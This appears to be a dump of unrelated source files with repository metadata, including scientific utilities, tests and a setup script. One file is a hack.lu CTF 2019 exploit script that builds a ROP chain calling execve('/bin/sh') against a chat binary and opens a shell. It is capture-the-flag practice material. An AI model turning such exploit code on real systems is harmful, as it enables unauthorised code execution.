def test_import_cl(self, mock_api_call):
"""Try importing the CL ontology, which was updated at some point and
broke the original parsing code"""
# We shouldn't be hitting the API at all here, because we should have
# the ontology already imported
mock_api_call.return_value = "The wrong answer"
created_terms = OntologyTerm.import_entire_ontology("cl")
self.assertEqual(
OntologyTerm.objects.all().count(),
2493, # Since we are using a VCR, this number should not change until we refresh it
)
self.assertEqual(OntologyTerm.objects.all().count(), created_terms)
self.assertEqual(
"hematopoietic cell",
OntologyTerm.get_or_create_from_api("CL:0000988").human_readable_name,
)
mock_api_call.assert_not_called()
@vcr.use_cassette(
"/home/user/data_store/cassettes/common.ontology_term.import_cellosaurus.yaml"
)
@patch("data_refinery_common.models.ontology_term.get_human_readable_name_from_api")
def test_import_cellosaurus(self, mock_api_call):
"""The cellosaurus ontology is not part of the OLS so we need to handle
it separately. We still include it because metaSRA uses its terms.
NOTE: the actual cellosaurus ontology is massive, so this VCR was
created using a trimmed-down cellosaurus ontology where I went in and
deleted a bunch of the publications and cell lines from the respective
lists. Besides this, no alterations were made to the original."""
# We shouldn't be hitting the API at all here, because we should have
# the ontology already imported
mock_api_call.return_value = "The wrong answer"
created_terms = OntologyTerm.import_entire_ontology("cvcl")
self.assertEqual(
OntologyTerm.objects.all().count(), 34, # This is the number I counted in the file
)
self.assertEqual(OntologyTerm.objects.all().count(), created_terms)
self.assertEqual(
"#W7079", OntologyTerm.get_or_create_from_api("CVCL:E549").human_readable_name,
)
mock_api_call.assert_not_called()
@vcr.use_cassette(
"/home/user/data_store/cassettes/common.ontology_term.cellosaurus_import_from_api.yaml"
)
def test_get_or_create_from_cellosaurus_api(self):
self.assertEqual(
"LNCaP", OntologyTerm.get_or_create_from_api("CVCL:0395").human_readable_name
)
| 40.59375 | 100 | 0.709392 | 685 | 5,196 | 5.089051 | 0.237956 | 0.034137 | 0.044177 | 0.047332 | 0.6965 | 0.690189 | 0.608434 | 0.573723 | 0.573723 | 0.573723 | 0 | 0.016809 | 0.209969 | 5,196 | 127 | 101 | 40.913386 | 0.8324 | 0.221324 | 0 | 0.4375 | 0 | 0 | 0.244657 | 0.186573 | 0 | 0 | 0 | 0 | 0.2375 | 1 | 0.0875 | false | 0 | 0.1875 | 0 | 0.2875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
65349c9a9000776d51444c80d41b291b58e2ff6b | 742 | py | Python | AskQuestionYN.py | SazanovGrigory/pythonCmdRun | 7543549deee88ff55497139bfdc12a880181c4c4 | [
"MIT"
] | 1 | 2021-04-30T21:54:40.000Z | 2021-04-30T21:54:40.000Z | AskQuestionYN.py | SazanovGrigory/pythonCmdRun | 7543549deee88ff55497139bfdc12a880181c4c4 | [
"MIT"
] | null | null | null | AskQuestionYN.py | SazanovGrigory/pythonCmdRun | 7543549deee88ff55497139bfdc12a880181c4c4 | [
"MIT"
] | null | null | null | def askQuestionYN(question):
positive=['y','Y','д','Д','YES','ДА','yes','да','Yes','Да']
negative=['n','N','н','Н','НЕТ','NO','нет','no','Нет','No']
tries=5
for i in range(tries):
try:
tmpstr=(input(question+' (Y/N) '))
except KeyboardInterrupt:
return (False)
position=[number for number in positive if number == tmpstr]
if position:
return (True)
position=[number for number in negative if number == tmpstr]
if position:
return (False)
print('Неверный ввод. Попробуйте еще раз.')
print('Использовано '+str(i+1)+' попыток из '+str(tries))
print("Ответ не был получен :-( возвращаем (NO)")
return (False) | 39.052632 | 68 | 0.552561 | 92 | 742 | 4.456522 | 0.5 | 0.036585 | 0.039024 | 0.04878 | 0.268293 | 0.146341 | 0 | 0 | 0 | 0 | 0 | 0.003683 | 0.268194 | 742 | 19 | 69 | 39.052632 | 0.751381 | 0 | 0 | 0.263158 | 0 | 0 | 0.193809 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0 | 0 | 0.263158 | 0.157895 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6536955befd2369e4ccc408a760b178fe86210f1 | 531 | py | Python | tests/api/v1/test_routes.py | hajareshyam/flask-seed | 5e1cddebd8496e39cc99c012e8a203ef9bd4b834 | [
"MIT"
] | 3 | 2018-02-11T23:20:18.000Z | 2019-12-15T10:29:22.000Z | tests/api/v1/test_routes.py | hajareshyam/flask-seed | 5e1cddebd8496e39cc99c012e8a203ef9bd4b834 | [
"MIT"
] | null | null | null | tests/api/v1/test_routes.py | hajareshyam/flask-seed | 5e1cddebd8496e39cc99c012e8a203ef9bd4b834 | [
"MIT"
] | 1 | 2019-11-01T06:42:47.000Z | 2019-11-01T06:42:47.000Z | import json
from flask import url_for
def test_get_incomes(client):
_incomes_url = url_for('api.v1.incomes')
# Make sure db is empty
response = client.get(_incomes_url)
assert len(response.json) == 0
# Create income
income = {
'amount': 100,
'description': 'test income'
}
client.post(_incomes_url, data=json.dumps(income), content_type='application/json')
# Get incomes and assert only one exists
response = client.get(_incomes_url)
assert len(response.json) == 1
| 23.086957 | 87 | 0.66855 | 71 | 531 | 4.816901 | 0.535211 | 0.116959 | 0.099415 | 0.140351 | 0.280702 | 0.280702 | 0.280702 | 0.280702 | 0.280702 | 0 | 0 | 0.014599 | 0.225989 | 531 | 22 | 88 | 24.136364 | 0.817518 | 0.13936 | 0 | 0.153846 | 0 | 0 | 0.128035 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 1 | 0.076923 | false | 0 | 0.153846 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
653927e36e6c722e124ad7cab7a4b86aab936ffd | 3,822 | py | Python | songmass/evaluate/utils.py | hongwen-sun/muzic | 50fb349e8ffe37212d9a3bfe6066f4c1e6657f3a | [
"MIT"
] | 1,903 | 2021-09-22T18:43:49.000Z | 2022-03-31T08:22:13.000Z | songmass/evaluate/utils.py | hongwen-sun/muzic | 50fb349e8ffe37212d9a3bfe6066f4c1e6657f3a | [
"MIT"
] | 33 | 2021-09-24T16:22:18.000Z | 2022-03-30T09:35:20.000Z | songmass/evaluate/utils.py | hongwen-sun/muzic | 50fb349e8ffe37212d9a3bfe6066f4c1e6657f3a | [
"MIT"
] | 124 | 2021-09-24T08:56:56.000Z | 2022-03-29T05:48:03.000Z | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
#
def get_pitch_duration_sequence(notes):
seq = []
i = 0
while i < len(notes):
if notes[i] > 128:
i += 1
else:
if i + 1 >= len(notes):
break
if notes[i + 1] <= 128:
i += 1
else:
pitch = str(notes[i])
duration = str(notes[i + 1])
seq.extend([pitch, duration])
i += 2
return seq
def separate_sentences(x, find_structure=False, SEP='[sep]'):
z = x.copy()
separate_positions = [k for k, v in enumerate(z) if v == SEP]
separate_positions.insert(0, -1)
sents = []
for i in range(len(separate_positions) - 1):
u, v = separate_positions[i] + 1, separate_positions[i + 1]
sent = z[u:v]
if find_structure:
sent = list(map(int, sent))
sent = get_pitch_duration_sequence(sent)
sents.append(sent)
return sents
def get_lyrics(lyric_file):
with open(lyric_file, 'r') as input_file:
lines = input_file.readlines()
lyrics = list(map(lambda x : x.rstrip('\n').split(' '), lines))
return lyrics
def get_song_ids(song_id_file):
with open(song_id_file, 'r') as input_file:
song_ids = input_file.readlines()
song_ids = list(map(lambda x : int(x.rstrip('\n')), song_ids))
return song_ids
def get_songs(
melody_file,
lyric_file=None,
song_id_file=None,
is_generated=False,
get_last=False,
find_structure=False,
cut_exceed_sent=False,
beam=5,
SEP='[sep]',
ALIGN='[align]',
):
lyrics = get_lyrics(lyric_file)
song_ids = get_song_ids(song_id_file)
lyric_sents = list(map(lambda x : x.count(SEP), lyrics))
def to_tuple(x):
pitch_duration = [i for i in x if i != SEP and i != ALIGN]
pd_tuples = [(pitch_duration[2 * i], pitch_duration[2 * i + 1]) for i in range(len(pitch_duration) // 2)]
return pd_tuples
with open(melody_file, 'r') as input_file:
melodies = input_file.readlines()
if is_generated:
melodies = list(filter(lambda x : x.startswith('H-'), melodies))
if len(melodies) == len(lyrics) * beam:
melodies.sort(key = lambda x : (int(x.split('\t')[0].split('-')[1]), - float(x.split('\t')[1])))
melodies = [x for i, x in enumerate(melodies) if i % beam == 0]
else:
melodies.sort(key = lambda x : int(x.split('\t')[0].split('-')[1]))
melodies = list(map(lambda x : x.rstrip('\n').split('\t')[-1], melodies))
assert len(melodies) == len(lyrics)
melody_seqs = list(map(lambda x : x.rstrip('\n').split(' '), melodies))
melody_seqs = [i for i in melody_seqs if i != ALIGN]
for i in range(len(melody_seqs)):
melody_seqs[i] = list(filter(lambda x : x.isdigit() or x == SEP, melody_seqs[i]))
if get_last:
for i in range(len(melody_seqs)):
if melody_seqs[i][-1] != SEP:
melody_seqs[i].append(SEP)
melody_seq_sents = list(map(lambda x : separate_sentences(x, find_structure=find_structure), melody_seqs))
song_seqs = []
for i, seq in enumerate(melody_seq_sents):
if cut_exceed_sent and len(seq) > lyric_sents[i]:
seq = seq[0 : lyric_sents[i]]
song_seq = []
for k, sent in enumerate(seq):
song_seq.extend(sent)
song_seq.append(SEP)
song_seqs.append(song_seq)
song_num = song_ids[-1] + 1
songs = [[] for _ in range(song_num)]
for k, v in enumerate(song_ids):
songs[v].extend(song_seqs[k])
songs = list(map(to_tuple, songs))
return songs
| 30.094488 | 113 | 0.570644 | 542 | 3,822 | 3.848708 | 0.190037 | 0.033557 | 0.017258 | 0.040268 | 0.235858 | 0.118408 | 0.099233 | 0.076222 | 0.037392 | 0.037392 | 0 | 0.012565 | 0.291994 | 3,822 | 126 | 114 | 30.333333 | 0.758315 | 0.023548 | 0 | 0.074468 | 0 | 0 | 0.011275 | 0 | 0 | 0 | 0 | 0 | 0.010638 | 1 | 0.06383 | false | 0 | 0 | 0 | 0.12766 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
653acd9ef897519567f178ca7a77b4c035d02398 | 1,821 | py | Python | MI_pandas_20180919.py | ShiuLab/Pathway_gene_prediction_in_tomato | a2488fdbc673df03b6065221e0a0a67c86f29230 | [
"MIT"
] | null | null | null | MI_pandas_20180919.py | ShiuLab/Pathway_gene_prediction_in_tomato | a2488fdbc673df03b6065221e0a0a67c86f29230 | [
"MIT"
] | null | null | null | MI_pandas_20180919.py | ShiuLab/Pathway_gene_prediction_in_tomato | a2488fdbc673df03b6065221e0a0a67c86f29230 | [
"MIT"
] | null | null | null | '''
export PATH=/mnt/home/azodichr/miniconda3/bin:$PATH
### should ssh dev-intel16-k80
input1: expression data, Fold change or FPKM
input2: start
input3: stop
'''
import sys,os,argparse
import pandas as pd
import numpy as np
import math
from sklearn.metrics.cluster import normalized_mutual_info_score
def warn(*args, **kwargs):
pass
import warnings
warnings.warn = warn
def main():
parser = argparse.ArgumentParser(description='This code is for calculating the Mutual information for a gene expression matrix. Because it is too slow to calculate a big matrix, you may want to do the job for a subset of your data, defined by the starting row number and the stoping row number.')
# Required
req_group = parser.add_argument_group(title='REQUIRED INPUT')
req_group.add_argument('-file', help='Expression matrix', required=True)
req_group.add_argument('-path', help='path to the Expression matrix', required=True)
req_group.add_argument('-start', help='where the subset starts', required=True)
req_group.add_argument('-stop', help='where the subset stops', required=True)
if len(sys.argv)==1:
parser.print_help()
sys.exit(0)
args = parser.parse_args()
file = args.file
path = args.path
start = int(args.start)
stop = int(args.stop)
out = open('MI_%s_%s_%s'%(file,start,stop),'w')
df = pd.read_csv(path+file, sep='\t', index_col = 0, header = 0)
D = {} ###
rowname = df.index.tolist()
title = 'gene'
for name in rowname:
title = title + '\t' + name
out.write(title + '\n')
out.flush()
x = start -1
while x < stop:
gene1 = rowname[x]
result = gene1
for gene2 in rowname:
MI = float(normalized_mutual_info_score(df.loc[gene1,:],df.loc[gene2,:]))
result = result + '\t%s'%MI
out.write(result + '\n')
out.flush()
x += 1
out.close()
if __name__ == '__main__':
main()
| 27.179104 | 297 | 0.707853 | 286 | 1,821 | 4.395105 | 0.468531 | 0.031822 | 0.035004 | 0.060461 | 0.099443 | 0.099443 | 0.074781 | 0.074781 | 0 | 0 | 0 | 0.012354 | 0.155409 | 1,821 | 66 | 298 | 27.590909 | 0.804941 | 0.09061 | 0 | 0.043478 | 0 | 0.021739 | 0.249392 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0.021739 | 0.130435 | 0 | 0.173913 | 0.021739 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
653aeb720022e1fa6cce3df66de41e2925004141 | 1,900 | py | Python | testify/plugins/test_case_time_log.py | timgates42/Testify | 50045dfc239e0118a88487b95b27a9c17732b4cf | [
"Apache-2.0"
] | null | null | null | testify/plugins/test_case_time_log.py | timgates42/Testify | 50045dfc239e0118a88487b95b27a9c17732b4cf | [
"Apache-2.0"
] | null | null | null | testify/plugins/test_case_time_log.py | timgates42/Testify | 50045dfc239e0118a88487b95b27a9c17732b4cf | [
"Apache-2.0"
] | null | null | null | # Copyright 2009 Yelp
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
from testify import test_reporter
class TestCaseJSONReporter(test_reporter.TestReporter):
def __init__(self, *args, **kwargs):
super(TestCaseJSONReporter, self).__init__(*args, **kwargs)
# Time to open a log file
self.log_file = open(self.options.test_case_json_results, "a")
# We also want to track log output
self.log_hndl = None
self._reset_logging()
def _reset_logging(self):
root = logging.getLogger('')
if self.log_hndl:
# Remove it if we already have one
root.removeHandler(self.log_hndl)
def test_case_complete(self, result):
self.log_file.write(json.dumps(result))
self.log_file.write("\n")
self._reset_logging()
def report(self):
self.log_file.write("RUN COMPLETE\n")
self.log_file.close()
return True
# Hooks for plugin system
def add_command_line_options(parser):
parser.add_option(
"--test-case-results",
action="store",
dest="test_case_json_results",
type="string",
default=None,
help="Store test results in json format",
)
def build_test_reporters(options):
if options.test_case_json_results:
return [TestCaseJSONReporter(options)]
else:
return []
| 29.230769 | 74 | 0.68 | 255 | 1,900 | 4.905882 | 0.509804 | 0.044764 | 0.043965 | 0.045564 | 0.076739 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005472 | 0.230526 | 1,900 | 64 | 75 | 29.6875 | 0.850205 | 0.343684 | 0 | 0.057143 | 0 | 0 | 0.082994 | 0.017901 | 0 | 0 | 0 | 0 | 0 | 1 | 0.171429 | false | 0 | 0.085714 | 0 | 0.371429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
653c1ca178e3a7217e7cc91b5cf8a256c13671ea | 5,458 | py | Python | components/mroipac/doppler/Doppler.py | vincentschut/isce2 | 1557a05b7b6a3e65abcfc32f89c982ccc9b65e3c | [
"ECL-2.0",
"Apache-2.0"
] | 1,133 | 2022-01-07T21:24:57.000Z | 2022-01-07T21:33:08.000Z | components/mroipac/doppler/Doppler.py | vincentschut/isce2 | 1557a05b7b6a3e65abcfc32f89c982ccc9b65e3c | [
"ECL-2.0",
"Apache-2.0"
] | 276 | 2019-02-10T07:18:28.000Z | 2022-03-31T21:45:55.000Z | components/mroipac/doppler/Doppler.py | vincentschut/isce2 | 1557a05b7b6a3e65abcfc32f89c982ccc9b65e3c | [
"ECL-2.0",
"Apache-2.0"
] | 235 | 2019-02-10T05:00:53.000Z | 2022-03-18T07:37:24.000Z | #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Copyright 2010 California Institute of Technology. ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# United States Government Sponsorship acknowledged. This software is subject to
# U.S. export control laws and regulations and has been classified as 'EAR99 NLR'
# (No [Export] License Required except when exporting to an embargoed country,
# end user, or in support of a prohibited end use). By downloading this software,
# the user agrees to comply with all applicable U.S. export laws and regulations.
# The user has the responsibility to obtain export licenses, or other export
# authority as may be required before exporting this software to any 'EAR99'
# embargoed foreign country or citizen of those countries.
#
# Author: Walter Szeliga
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
import isceobj
from iscesys.Component.Component import Component, Port
from mroipac.doppler import doppler
class Doppler(Component):
def __init__(self):
super(Doppler, self).__init__()
self.slcImage = ''
self.slcFilename = ''
self.lines = None
self.startLine = 1
self.samples = None
self.dim1_r_fd = None
self.r_fd = []
self.createPorts()
self.dictionaryOfVariables = {
'WIDTH': ['self.samples','int','mandatory'],
'YMIN': ['self.startLine','int','mandatory'],
'FILE_LENGTH': ['self.Lines','int','mandatory']}
self.dictionaryOfOutputVariables= {'R_FD': 'self.r_fd'}
self.descriptionOfVariables = {}
return None
def createPorts(self):
# Create Input Ports
framePort = Port(name='frame',method=self.addFrame)
instrumentPort = Port(name='instrument',method=self.addInstrument)
imagePort = Port(name='image',method=self.addImage)
self._inputPorts.add(framePort)
self._inputPorts.add(imagePort)
self._inputPorts.add(instrumentPort)
return None
def addFrame(self):
frame = self._inputPorts.getPort(name='frame').getObject()
if (frame):
try:
self.samples = frame.getNumberOfSamples()
self.lines = frame.getNumberOfLines()
except AttributeError:
print( "Object %s requires getNumberOfSamples() and getNumberOfLines() methods" % frame.__class__)
def addImage(self):
image = self._inputPorts.getPort(name='image').getObject()
if (image):
try:
self.slcFilename = image.getFilename()
except AttributeError:
print ("Object %s requires a getFilename() methods" % image.__class__)
def addInstrument(self):
pass
def setSLCfilename(self,filename):
self.slcFilename = filename
def setSamples(self,length):
self.samples = int(length)
def setLines(self,lines):
self.lines = int(lines)
def setStartLine(self,start):
if (start < 1):
raise ValueError("START_LINE must be greater than 0")
self.startLine = int(start)
def getDoppler(self):
return self.r_fd
def calculateDoppler(self,slcImage=None):
for port in self._inputPorts:
method = port.getMethod()
method()
slcCreatedHere = False
if (slcImage == None):
slcImage = self.createSlcImage()
slcCreateHere = True
slcImagePt= slcImage.getImagePointer()
self.setState()
self.allocateArrays()
doppler.doppler_Py(slcImagePt)
self.getState()
self.deallocateArrays()
if(slcCreatedHere):
slcImage.finalizeImage()
def createSlcImage(self):
# Check file name
width = self.samples
from isceobj.Image.SlcImage import SlcImage
objRaw = SlcImage()
objRaw.initImage(self.slcFilename,'read','l',width)
objRaw.createImage()
return objRaw
def setState(self):
# Set up the stuff needed for doppler
doppler.setLines_Py(self.lines)
doppler.setSamples_Py(self.samples)
doppler.setStartLine_Py(self.startLine)
self.dim1_r_fd = int(self.samples)
def getState(self):
self.r_fd = doppler.get_r_fd_Py(self.dim1_r_fd)
def allocateArrays(self):
if (self.dim1_r_fd == None):
self.dim1_r_fd = len(self.r_fd)
if (not self.dim1_r_fd):
print("Error. Trying to allocate zero size array")
raise Exception
doppler.allocate_r_fd_Py(self.dim1_r_fd)
def deallocateArrays(self):
doppler.deallocate_r_fd_Py()
| 36.145695 | 114 | 0.608465 | 593 | 5,458 | 5.504216 | 0.367622 | 0.014706 | 0.019301 | 0.023591 | 0.051164 | 0.047794 | 0.011642 | 0.011642 | 0 | 0 | 0 | 0.005568 | 0.276108 | 5,458 | 150 | 115 | 36.386667 | 0.820552 | 0.265482 | 0 | 0.061856 | 0 | 0 | 0.082075 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.164948 | false | 0.010309 | 0.041237 | 0.010309 | 0.257732 | 0.030928 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
653ebac9b608378bd958fc8eb802635c6758f75e | 1,167 | py | Python | setup.py | jackeylu/sentry-wechat | 66dcbbd88f4a3a77a40e45f76d95b4f5f4ef769a | [
"MIT"
] | 15 | 2020-09-08T18:10:17.000Z | 2022-01-20T02:42:27.000Z | setup.py | jackeylu/sentry-wechat | 66dcbbd88f4a3a77a40e45f76d95b4f5f4ef769a | [
"MIT"
] | 2 | 2020-07-16T23:16:00.000Z | 2021-04-14T10:54:23.000Z | setup.py | jackeylu/sentry-wechat | 66dcbbd88f4a3a77a40e45f76d95b4f5f4ef769a | [
"MIT"
] | 5 | 2020-06-09T04:14:49.000Z | 2021-06-01T11:17:27.000Z | #!/usr/bin/env python
# coding: utf-8
#############################################
# File Name: setup.py
# Author: whzcorcd
# Mail: whzcorcd@gmail.com
# Created Time: 2020-06-08
#############################################
from setuptools import setup, find_packages
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name="sentry-wechat",
version='0.0.3',
author='whzcorcd',
author_email='whzcorcd@gmail.com',
url='https://github.com/corcd/sentry-wechat',
description='A sentry extension which share information to Wechat Work',
long_description=long_description,
long_description_content_type="text/markdown",
license='MIT',
keywords='sentry wechat',
include_package_data=True,
zip_safe=False,
package_dir={'': 'src'},
packages=find_packages('src'),
install_requires=[
'sentry>=9.0.0',
'requests',
],
entry_points={
'sentry.plugins': [
'sentry_wechat = sentry_wechat.plugin:WechatPlugin'
]
},
classifiers=[
'Programming Language :: Python :: 2.7',
"License :: OSI Approved :: MIT License",
]
)
| 25.933333 | 76 | 0.588689 | 128 | 1,167 | 5.234375 | 0.664063 | 0.089552 | 0.047761 | 0.089552 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01826 | 0.202228 | 1,167 | 44 | 77 | 26.522727 | 0.701396 | 0.104542 | 0 | 0 | 0 | 0 | 0.361433 | 0.034773 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.03125 | 0 | 0.03125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
653ed37735f577d573c1f58e54291ad3d11818c5 | 1,236 | py | Python | Gathered CTF writeups/ptr-yudai-writeups/2019/hacklu_CTF_2019/Chat/solve.py | mihaid-b/CyberSakura | f60e6b6bfd6898c69b84424b080090ae98f8076c | [
"MIT"
] | 1 | 2022-03-27T06:00:41.000Z | 2022-03-27T06:00:41.000Z | Gathered CTF writeups/ptr-yudai-writeups/2019/hacklu_CTF_2019/Chat/solve.py | mihaid-b/CyberSakura | f60e6b6bfd6898c69b84424b080090ae98f8076c | [
"MIT"
] | null | null | null | Gathered CTF writeups/ptr-yudai-writeups/2019/hacklu_CTF_2019/Chat/solve.py | mihaid-b/CyberSakura | f60e6b6bfd6898c69b84424b080090ae98f8076c | [
"MIT"
] | 1 | 2022-03-27T06:01:42.000Z | 2022-03-27T06:01:42.000Z | from ptrlib import *
def nc():
sock.sendlineafter("> ", "/nc")
sock.recvuntil("Channel ")
return int(sock.recvline()[:-1])
def echo(size, data):
sock.sendlineafter("> ", "/e")
sock.sendline(str(size))
sock.sendline(data)
return
def pc():
sock.sendlineafter("> ", "/pc")
return
def qc():
sock.sendlineafter("> ", "/qc")
return
def jc(cid):
sock.sendlineafter("> ", "/jc {}".format(cid))
elf = ELF("./chat")
sock = Socket("localhost", 9999)
#sock = Socket("chat.forfuture.fluxfingers.net", 1337)
rop_pop_eax = 0x08051cf6
rop_pop_ebx = 0x0804901e
rop_int80 = 0x0807d3d0
# channel 1
nc()
pc()
# channel 2
nc()
pc()
# ROP
envp = 0x8048000 + next(elf.find("\0"*4))
payload = b''
payload += flat([
p32(0xdeadbeef),
p32(elf.symbol("command") + 0x14),
p32(elf.symbol("command") + 0x10),
p32(rop_pop_ebx),
p32(elf.symbol("command") + 0x8),
p32(rop_pop_eax),
p32(11),
p32(rop_int80)
])
assert b'\n' not in payload
assert b'\r' not in payload
jc(1)
# 0x3d090 - 0xa30
echo(250000, payload)
qc()
payload = b"/jc 2\0\0\0"
payload += b"/bin/sh\0"
payload += p32(elf.symbol("command") + 8)
payload += p32(0)
sock.sendlineafter("> ", payload)
sock.interactive()
| 18.447761 | 54 | 0.618123 | 172 | 1,236 | 4.383721 | 0.412791 | 0.135279 | 0.06366 | 0.100796 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.099108 | 0.183657 | 1,236 | 66 | 55 | 18.727273 | 0.648167 | 0.075243 | 0 | 0.14 | 0 | 0 | 0.093146 | 0 | 0 | 0 | 0.052724 | 0 | 0.04 | 1 | 0.1 | false | 0 | 0.02 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6542b0b0b0b176befff7ce8478620d35eddee986 | 8,038 | py | Python | pkgcore/test/scripts/test_pmaint.py | pombreda/pkgcore | b438fc573af1a031d7ce12adbbf299bab5338451 | [
"BSD-3-Clause"
] | 1 | 2021-07-05T13:10:18.000Z | 2021-07-05T13:10:18.000Z | pkgcore/test/scripts/test_pmaint.py | vapier/pkgcore | 35a7e4f4f0fc61dd9c4dc72d35a57e2e9d5b832f | [
"BSD-3-Clause"
] | 8 | 2015-03-24T14:21:44.000Z | 2015-03-24T14:21:44.000Z | pkgcore/test/scripts/test_pmaint.py | vapier/pkgcore | 35a7e4f4f0fc61dd9c4dc72d35a57e2e9d5b832f | [
"BSD-3-Clause"
] | null | null | null | # Copyright: 2006-2011 Brian Harring <ferringb@gmail.com>
# Copyright: 2006 Marien Zwart <marienz@gentoo.org>: BSD/GPL2
# License: BSD/GPL2
from functools import partial
from snakeoil import compatibility
from snakeoil.formatters import PlainTextFormatter
from snakeoil.mappings import AttrAccessible
from pkgcore.config import basics, ConfigHint, configurable
from pkgcore.ebuild.cpv import CPV
from pkgcore.operations.repo import install, uninstall, replace, operations
from pkgcore.repository import util, syncable
from pkgcore.scripts import pmaint
from pkgcore.sync import base
from pkgcore.test import TestCase
from pkgcore.test.scripts import helpers
if compatibility.is_py3k:
from io import BytesIO
else:
from StringIO import StringIO as BytesIO
Options = AttrAccessible
class FakeSyncer(base.syncer):
def __init__(self, *args, **kwargs):
self.succeed = kwargs.pop('succeed', True)
base.syncer.__init__(self, *args, **kwargs)
self.synced = False
def _sync(self, verbosity, output_fd, **kwds):
self.synced = True
return self.succeed
class SyncableRepo(syncable.tree, util.SimpleTree):
pkgcore_config_type = ConfigHint(typename='raw_repo')
def __init__(self, succeed=True):
util.SimpleTree.__init__(self, {})
syncer = FakeSyncer('/fake', 'fake', succeed=succeed)
syncable.tree.__init__(self, syncer)
success_section = basics.HardCodedConfigSection({'class': SyncableRepo,
'succeed': True})
failure_section = basics.HardCodedConfigSection({'class': SyncableRepo,
'succeed': False})
class TestSync(TestCase, helpers.ArgParseMixin):
_argparser = pmaint.sync
def test_parser(self):
values = self.parse(repo=success_section)
self.assertEqual(['repo'], [x[0] for x in values.repos])
values = self.parse('repo', repo=success_section)
self.assertEqual(['repo'], [x[0] for x in values.repos])
def test_sync(self):
config = self.assertOut(
[
"*** syncing 'myrepo'...",
"*** synced 'myrepo'",
],
myrepo=success_section)
self.assertTrue(config.raw_repo['myrepo']._syncer.synced)
self.assertOut(
[
"*** syncing 'myrepo'...",
"*** failed syncing 'myrepo'",
],
myrepo=failure_section)
self.assertOutAndErr(
[
"*** syncing 'goodrepo'...",
"*** synced 'goodrepo'",
